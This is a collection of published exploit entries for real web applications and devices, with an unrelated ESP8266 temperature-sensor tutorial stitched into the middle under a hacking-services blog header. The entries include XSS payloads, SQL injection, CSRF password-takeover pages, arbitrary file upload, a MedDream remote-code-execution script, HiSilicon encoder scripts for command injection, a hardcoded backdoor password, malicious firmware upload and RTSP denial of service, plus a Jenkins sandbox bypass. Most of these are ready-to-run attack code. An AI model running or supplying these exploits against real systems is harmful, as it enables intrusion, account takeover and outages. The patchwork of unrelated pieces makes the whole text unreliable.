# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-10-09
# Exploit Author: Enes Özeser
# Vendor Homepage: https://dynpg.org/
# Version: 4.9.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Login to admin panel.
2- Click on the "Texts" button.
3- Write XSS payload into the Groupname.
4- Press "Create" button.
XSS Payload ==> <script>alert("XSS");</script>
==> HTTP Request <==
POST /index.php?show=4 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
Content-Length: 725
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/index.php?show=4
Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
Upgrade-Insecure-Requests: 1
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="NEW_GROUP_NAME"
<script>alert("XSS");</script>
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GROUP_ID"
0
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_SUBMIT"
Create
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_ACTION"
new_grp
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="dpg_csrf_token"
3F16478C29BED20AA73F1D25CB23F471
-----------------------------342819783638885794661955465553--
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151822
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
In this article, let’s take a look at how to use ESP8266+DHT11 and Binker to realize the reading of indoor temperature and humidity.
Achieve the effect
Preparation of materials
esp8266DHT11
Line connection
VCC-- 3VGND--GNDDATA-- 2
Code
#define BLINKER_WIFI
#define BLINKER_MIOT_SENSOR //Introduce Xiaoai classmate
#include Blinker.h
#include DHT.h //DHT11 sensor header file
#define DHTPIN 4 //Define DHT11 module connection pin io4 (D2 pin)
#define DHTTYPE DHT11 //Use the DHT11 temperature and humidity module, of course you can also replace other DHTs
char auth[]='1c2ce3eef946'; //The key key of the lamp app
char ssid[]='PDCN'; //WiFi name to connect to
char pswd[]='1234567890'; //WiFi password
BlinkerNumber HUMI('humi'); //Define the humidity data key name
BlinkerNumber TEMP('temp'); //Define the temperature data key name
DHT dht(DHTPIN, DHTTYPE); //Define dht
float humi_read=0, temp_read=0; //Initialize the read data
//Dashboard components
void heartbeat()
{
HUMI.print(humi_read); //Relay humidity data back to blinkerapp
TEMP.print(temp_read); //Relay the temperature data to blinkerapp
}
//Real-time curve chart component
void dataStorage()
{
Blinker.dataStorage('temp', temp_read);
Blinker.dataStorage('humi', humi_read);
}
//The data is returned to Xiao Ai classmate
void miotQuery(int32_t queryCode)
{
BLINKER_LOG('MIOT Query codes: ', queryCode);
int humi_read_int=humi_read; //Convert float to int type, integer
BlinkerMIOT.humi(humi_read_int); //Xiaoai receives humidity
BlinkerMIOT.temp(temp_read); //Xiaoai receives temperature
BlinkerMIOT.print();
}
void setup()
{
//Initialize the serial port Serial, enable debug output
Serial.begin(115200);//Bad rate
BLINKER_DEBUG.stream(Serial);
BLINKER_DEBUG.debugAll();
Blinker.begin(auth, ssid, pswd);//WIFI initialization settings
Blinker.attachHeartbeat(heartbeat);//Register dashboard
dht.begin();
BlinkerMIOT.attachQuery(miotQuery);//Register Xiaoai
Blinker.attachDataStorage(dataStorage);//Register real-time curve
}
void loop()
{
Blinker.run();//Responsible for processing the data received by blinker. Each time it runs, it will parse the data received by the device once. (This is very important)
float h=dht.readHumidity();//Read the humidity data collected by DHT11
float t=dht.readTemperature();//Read the temperature data collected by DHT11
if (isnan(h) || isnan(t))//Judge whether the temperature and humidity value is empty
{
BLINKER_LOG('Reading sensor data failed');
}
else
{
BLINKER_LOG('Humidity: ', h, ' %');//Print out debug information
BLINKER_LOG('Temperature: ', t, ' *C');
humi_read=h;
temp_read=t;
}
Blinker.delay(200);
//Delay function, maintains connection between devices and data reception processing during the delay process
}
About the temperature and humidity change curve
The cloud storage data here only supports networked devices. If the thermometer is powered off and the network is not stored, the data will not be stored, and it will suddenly decline in the curve chart, and it will suddenly rise after reconnection. The cloud storage function here is not very powerful. If you modify the code and re-upload the program, the data stored in the cloud will be cleared before.
2. Specific functions
(1) Cloud storage data function:
void dataStorage()//Cloud storage temperature and humidity data function
{
Blinker.dataStorage('temp', temp_read);//Storage temperature
Blinker.dataStorage('humi', humi_read);//Storage humidity
}Blinker.dataStorage('temp', temp_read); The first parameter is the data key name, which is used to display in the mobile phone icon, and the second parameter is the data variable to be stored.
(2) After writing the function in the code, you need to call this function in the main loop, and the call function is as follows:
Blinker.attachDataStorage(dataStorage); This function means that the above dataStorage function will be called every time the loop is to achieve the effect of storing the data obtained every time.
APP Layout
Little Love Effect
# Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2020-08-19
# Exploit Author: mrb3n
# Vendor Homepage: https://www.openmaint.org/en
# Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download
# Version: 1.1-2.4.2
# Category: Webapps
# Tested on: Ubuntu 16.04
# CVE: N/A
# POC: http://localhost:8080/openmaint/administration.jsp
#
POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460
Content-Length: 1369
Origin: http://192.168.1.1:8080
DNT: 1
Connection: close
Referer: http://192.168.1.1:8080/openmaint/administration.jsp
Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf
Upgrade-Insecure-Requests: 1
-----------------------------12239060382062588071523757460
Content-Disposition: form-data; name="fileStore"
images
-----------------------------12239060382062588071523757460
Content-Disposition: form-data; name="folder"
d41d8cd98f00b204e9800998ecf8427e
-----------------------------12239060382062588071523757460
Content-Disposition: form-data; name="file"; filename="malicious.jsp"
Content-Type: application/octet-stream
[Malicious code here]
-----------------------------12239060382062588071523757460--
# The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example:
http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp
# How to fix: Update to the latest version
# Earlier versions as well as other 1.1-x versions are likely vulnerable.
# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password)
# Date: 2020-10-07
# Exploit Author: George Tsimpidas
# Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7
# Version: 0.7
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
# Category: Webapp
Description:
There is no CSRF protection in Liman application, with a little help
of social engineering (like sending a link via email/chat) an attacker may
force the victim to click on a malicious link, with the purpose of
manipulating his current account information, or changing entirely his
password.
Vulnerable Endpoints :
http://127.0.0.1:5000/settings/profile
http://127.0.0.1:5000/settings/password
Proof of Concept
Download the application, make an account and login inside the
panel under : http://127.0.0.1:5000 expose the docker port on 5000.
Save this .html files and send it to victim (Victim should be
logged in in the browser)
Crafted value will be added.
Account Information CSRF :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:5000/settings/profile" method="POST">
<input type="hidden" name="username" value="betatest" />
<input type="hidden" name="email" value="test@gmail.com" />
<input type="submit" value="TakeOver Account Settings" />
</body>
</html>
Password Change CSRF :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:5000/settings/password" method="POST">
<input type="hidden" name="password" value="takeover" />
<input type="hidden" name="newPassword" value="takeover" />
<input type="hidden" name="confirmPassword" value="takeover" />
<input type="submit" value="Password TakeOver" />
</body>
</html>
#!/usr/bin/python
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 10-10-2020
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
#
# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
#
##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters; IP, filename, command
#
#
# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter command: whoami
# 170759
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
from urllib2 import urlopen
import requests
import sys
import time
from datetime import datetime, timedelta
ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
cmd = raw_input("Enter command: ")
URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'
def main():
session = requests.Session()
files = [
('actionvalue', (None, 'Attach', None)),
('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
('action', (None, 'Attach', None)),
]
site = session.post(URL, files=files)
today = datetime.today()
upload_date = today.strftime("%Y%m%d")
less = 1
now1 = datetime.now()
up_time1 = now1.strftime("%H%M%S")
print(up_time1)
#varying time checks +/-
now2 = now1 - timedelta(seconds=less)
up_time2 = now2.strftime("%H%M%S")
now3 = now2 - timedelta(seconds=less)
up_time3 = now3.strftime("%H%M%S")
now4 = now3 - timedelta(seconds=less)
up_time4 = now4.strftime("%H%M%S")
now5 = now4 - timedelta(seconds=less)
up_time5 = now5.strftime("%H%M%S")
now6 = now5 - timedelta(seconds=less)
up_time6 = now6.strftime("%H%M%S")
now7 = now6 - timedelta(seconds=less)
up_time7 = now7.strftime("%H%M%S")
now8 = now1 + timedelta(seconds=less)
up_time8 = now8.strftime("%H%M%S")
now9 = now8 + timedelta(seconds=less)
up_time9 = now8.strftime("%H%M%S")
now10 = now1 + timedelta(seconds=less)
up_time10 = now9.strftime("%H%M%S")
up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
for i in up_time_array:
r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
if r.status_code == 200:
print r.content
print r.url
else:
print ("404")
if __name__ == '__main__':
main()
# Exploit Title: Small CRM 2.0 - 'email' SQL Injection
# Google Dork: N/A
# Date: 2020-10-10
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: V2.0
# Tested on: Kali Linux
# CVE : N/A
========== Vulnerable Code ==========
mysqli_query $row1 = mysqli_query($con, "select email,password from user
where email='" . $_POST['email'] . "'"); // dbconnection.php
========== Post Request ====================
POST /crm/forgot-password.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/crm/forgot-password.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Cookie: __test=ec283e73906679549573af64209a5d5b;
PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
Upgrade-Insecure-Requests: 1
email=test@test.com&submit=
============= Vulnerable Parameter ===============
email (POST)
============= Payload =========================
' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
else
echo "ERROR: $?"
fi
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 1 ]
then
echo "Usage: $0 <server>[:<port>]"
exit 1
fi
printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
if [ "$ret" -eq 0 ]
then
echo "the password is '$password'"
echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
echo "ERROR: curl returned $ret"
fi
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
printf "uploading the RAR file... "
if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
rm uk.rar
else
echo "ERROR: $?"
fi
# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via
Guardian Name, Guardian Relation, Guardian Contact no, Address, City
# Google Dork: N/A
# Date: 2020-10-08
# Exploit Author: Kokn3t
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system
# Version: V 2.1
# Tested on: Windows 10, Kali 2020.1
# CVE : CVE-2020-25270
######## Attack Vector ########
Install Hostel Management System V 2.1
1) User Module
Login as user and go to "Book Hostel"
(http:/localhost/hostel/book-hostel.php) and start booking.
Add malicious script in these fields - "<script>alert('XSS');</script>"
i. Guardian Name
ii. Guardian Relation
iii.Guardian Contact no
iv. Address
vi. City
After that will get a prompt "Student Successfully register" and after
pressing "See All", XSS will be triggered.
2) Admin Module
Login in as Admin and go to "Management Students", and "View Full details"
of booked student's record, XSS will be triggered also.
# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Date: 8th October 2020
# Exploit Author: dmw0ng
# Vendor Homepage: https://www.jenkins.io
# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip
# Version: Jenkins 2.63
# Tested on: Ubuntu 18.04 / 20.04
# CVE : CVE-2019-1003030
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1
URL Encoding the following for RCE
```public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} ```
to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
cseq=$(printf "0%0.s" {1..3000})
printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fi
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Exploit Title: Persistent XSS on Comtrend AR-5387un router
Date: 19/10/2020
Exploit Author: OscarAkaElvis
Vendor Homepage: https://www.comtrend.com/
Version: Comtrend AR-5387un router
Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
CVE: CVE-2018-8062
Disclosure timeline:
08/03/2018: Vulnerability was discovered
10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
11/03/2018: Mitre answered, CVE number reserved
11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
18/10/2020: Exploit creation
19/10/2020: Exploit sent to exploit-db
Exploitation explanation:
To exploit this vulnerability, once logged into the router, a WAN service must be created
Click on "Advanced Setup", "WAN Service". "Add button", "Next"
Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script>
Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
The result of the XSS will be displayed and triggered on the WAN services page
This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload
Happy hacking :)
OscarAkaElvis - https://twitter.com/OscarAkaElvis
"""
# Dependencies and libraries
import requests
from requests.auth import HTTPBasicAuth
import re
from sys import argv, exit
import argparse
from os import path
from time import sleep
class Exploit(object):
# Global class vars
session = requests.Session()
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
ip = None
username = None
password = None
payload = None
default_ip = "192.168.1.1"
default_username = "admin"
default_password = "admin"
default_payload = "<script>alert('xss');</script>"
exploit_version = "1.0"
current_sessionkey = None
referer_sessionkey = None
script_name = path.basename(argv[0])
description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''
def start_msg(self):
print("[*] Starting CVE-2018-8062 exploit...")
sleep(0.5)
def check_params(self, arguments):
parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
args = parser.parse_args(arguments)
self.start_msg()
print("[*] Launch the exploit using -h argument to check all the available options")
print()
if not args.ip:
self.ip = self.default_ip
print("[!] Warning, no ip set, default will be used: " + str(self.ip))
else:
self.ip = args.ip
if not args.username:
self.username = self.default_username
print("[!] Warning, no username set, default will be used: " + str(self.username))
else:
self.username = args.username
if not args.password:
self.password = self.default_password
print("[!] Warning, no password set, default will be used: " + str(self.password))
else:
self.password = args.password
if not args.payload:
self.payload = self.default_payload
print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
else:
self.password = args.password
def print_version(self):
print()
return 'v{}'.format(self.exploit_version)
def check_router(self):
try:
print()
print("[*] Trying to detect router...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
print("[+] Comtrend router detected successfully")
else:
print()
print("[-] It seems the target is not a Comtrend router")
print("[*] Exiting...")
exit(1)
except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
print()
print("[-] Can't connect to the router")
print("[*] Exiting...")
exit(1)
def check_login(self):
print()
print("[*] Trying to login...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
if response.status_code != 401:
print("[+] Login successfully!")
sleep(1)
else:
print()
print("[-] Can't login into the router. Check your creds!")
print("[*] Exiting...")
exit(1)
def get_sessionKey(self, response_text):
sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
if sessionKey is not None:
sessionKey = sessionKey.group(1)
else:
sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
if sessionKey is not None:
sessionKey = sessionKey.group(1)
return sessionKey
def step1(self):
print()
print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.current_sessionkey = self.get_sessionKey(response.content)
print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
sleep(1)
def step2(self):
print()
print("[*] Performing step 2/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step3(self):
print()
print("[*] Performing step 3/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step4(self):
print()
print("[*] Performing step 4/8...")
paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step5(self):
print()
print("[*] Performing step 5/8...")
paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step6(self):
print()
print("[*] Performing step 6/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step7(self):
print()
print("[*] Performing step 7/8...")
paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def final_step8(self):
print()
print("[*] Performing final step 8/8. Deploying XSS payload...")
paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
print()
print("[+] XSS payload deployed successfully")
print("[+] Happy hacking :) . Author: OscarAkaElvis")
@staticmethod
def main(self, arguments):
self.check_params(arguments)
self.check_router()
self.check_login()
self.step1()
self.step2()
self.step3()
self.step4()
self.step5()
self.step6()
self.step7()
self.final_step8()
exit(0)
if __name__ == '__main__':
ImportObject = Exploit()
ImportObject.main(ImportObject, argv[1:])
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Author: Alperen Ergel
# Contact: @alpren_ae
# Software Homepage: https://textpattern.com/
# Version : 4.6.2
# Tested on: windows 10 / xammp
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 2020-10-29
######## Description ########
#
# 1-) Loggin administrator page
#
# 2-) Go admin > prefs > site
#
# 3-) All inputs vulnerable to CSRF
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/textpattern/textpattern/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1806
Connection: close
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40
Upgrade-Insecure-Requests: 1
Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&
